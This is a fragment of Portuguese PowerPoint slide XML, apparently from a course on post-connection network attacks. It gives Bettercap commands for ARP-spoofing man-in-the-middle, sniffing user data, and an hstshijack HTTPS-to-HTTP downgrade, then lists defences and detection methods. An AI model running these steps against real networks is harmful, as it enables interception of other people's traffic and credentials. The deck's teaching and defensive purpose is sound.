              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/sys/net/ipv4/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>ip_forward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7733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E17E755-6AF3-4802-B181-337D1628F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Ataques de pós-conexão à rede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CEBE44DB-8970-4D8B-87EA-55B40024C066}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="55359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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Instalação do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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3553032-43A0-4B23-8549-9A53D170EBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="2222355"/>
            <a:ext cx="5362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Instalação do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>bettercap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apt-get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap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103E367-15FB-49EE-8E28-656AFA2AFCD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="3306016"/>
            <a:ext cx="71733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Definido a interface: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bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> eth0 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>No caso de ser uma rede </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> usamos wlan0 no lugar do eth0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3FF654D-D73C-4CD3-BA27-8F418965BFD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4550007"/>
            <a:ext cx="7173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Vendo as possibilidades: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bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> --help </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3508034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34B9D67-3BDE-42F0-90D0-D320E2E9B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t-BR" dirty="0"/>
              <a:t>Ataques de pós-conexão à rede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CD01C147-F920-4219-9A8F-388AB47D216E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="5535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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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E2CF290-4EF2-4EF8-A88C-A61C94594354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="2222355"/>
            <a:ext cx="6143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Ligando módulos importantes para reconhecimento da rede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net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>on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2F074C9-A49F-4521-BDAA-6276E6BEE3B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994114" y="3245262"/>
            <a:ext cx="6143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Para visualizar as máquinas conectadas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net.show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75149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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="5535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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065135" y="2187666"/>
            <a:ext cx="61435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Ataque Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>Middle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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arp.spoof.fullduplex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>true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set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arp.spoof.targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> 10.0.2.13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arp.spoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>on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B388250-BB4B-4BFF-8EB7-2ABA9AEBF74C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="3696870"/>
            <a:ext cx="6143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Detectando dados do usuário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net.sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>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53191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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="5535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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065135" y="2187666"/>
            <a:ext cx="6143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Atque</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>Middle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net.sniff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30941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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="5535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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065134" y="2187666"/>
            <a:ext cx="87802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Criação de um </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>caplet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> novo que irá organizar nosso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> automaticamente:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>cd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/root</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>spoof.cap</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>net.probe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>on</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arp.spoof.fullduplex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arp.spoof.targets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> 10.0.2.13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>net.sniff.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>net.sniff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>on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E4F675B-4740-4061-9C50-76AD98ED2957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1065134" y="4823743"/>
            <a:ext cx="8780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Agora basta rodar:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>etho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>caplet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> /root/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>arpspoof.cap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440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EFBFE3-13CE-4AA9-BD54-983C4DFDD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adaptador de redes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EA7A392-CB84-4638-B237-E2A7816B52F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353505" y="1847654"/>
            <a:ext cx="114849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err="1"/>
              <a:t>Atheros</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> AR9271  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t>capaz de produzir um ataque somente a redes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0" err="1"/>
              <a:t>wi-fi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> de frequência 2.4 GHz </a:t>
            </a:r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B307D1C-479C-4449-98F6-1DD5F6781AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="556182" y="2955650"/>
            <a:ext cx="427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Modelo sem marca  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>mais barato, mas de qualidade inferior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D96356D-C0E0-4124-93B5-795B409EC1BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6392945" y="2955649"/>
            <a:ext cx="427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Alfa AWUS036NHA </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>mais caro, mas de qualidade superior</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Imagem 7" descr="Uma imagem contendo Texto&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5FEF760-5C72-4AEF-BABE-B75219AC7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582" y="3826937"/>
            <a:ext cx="1552575" cy="2076450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Imagem 9" descr="Em preto e branco&#10;&#10;Descrição gerada automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06360072-477D-45A5-BBE9-CA7752C543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838" y="3601980"/>
            <a:ext cx="1214943" cy="265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3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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="5535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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="2328171"/>
            <a:ext cx="87802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Transformando HTTPS em HTTP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Baixe o zip hstshijack.zip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Extraia os arquivos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Copie os arquivos extraídos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Vá para </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/caplets/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Mude</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>arquivo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hstshijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> original que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pasta para hstshijack2 e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o novo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F77DE52-9DCF-4B04-812A-329527E3D80A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="4282738"/>
            <a:ext cx="87802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Transformando HTTPS em HTTP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Baixe o arquivo binário </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap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rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> (quem preferir pode renomear o original para bettercap2)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cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Downlaods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/bin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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> +x /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>Agora podemos usar nosso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> normalmente</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18725798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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="55359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r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> – Uso do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Bettercap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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="2328171"/>
            <a:ext cx="87802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Ataque Man in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0" err="1"/>
              <a:t>Middle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t> para sites HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR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Bettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>iface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> eth0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>caplet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>spoof.cap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hstshijack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>hstshijack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45681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D56367E-7432-4346-983F-FFE4BAA4D8B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Ataques de pós-conexão à rede</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR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44979C07-7866-42FD-9A47-C0B18C9F5AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="994113" y="1508434"/>
            <a:ext cx="6143533" cy="55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t-BR" dirty="0"/>
              <a:t>MITM – Man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Middle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6EF825C-B562-49C8-A590-45593ADB5E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4082497"/>
            <a:ext cx="87802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Como se proteger contra ataques à redes sem fio?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Evitar uso de redes abertas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Uso de VPN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HTTPSEverywhere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> plugin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Xarp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0ACCCDC-2964-4439-B5F1-6A1CFDC0C992}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2328171"/>
            <a:ext cx="87802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Como verificar atividades suspeitas na rede?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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -a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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Preferences</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Protocols</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -&gt; ARP/RARP -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Detect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>stroms</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="pt-BR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>Analyze</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> -&gt; expert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" err="1"/>
              <a:t>inforamation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9297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EFBFE3-13CE-4AA9-BD54-983C4DFDD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adaptador de redes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EA7A392-CB84-4638-B237-E2A7816B52F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="353505" y="1847654"/>
            <a:ext cx="114849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err="1"/>
              <a:t>Realtek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2400" dirty="0"/>
              <a:t> AR8812AU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
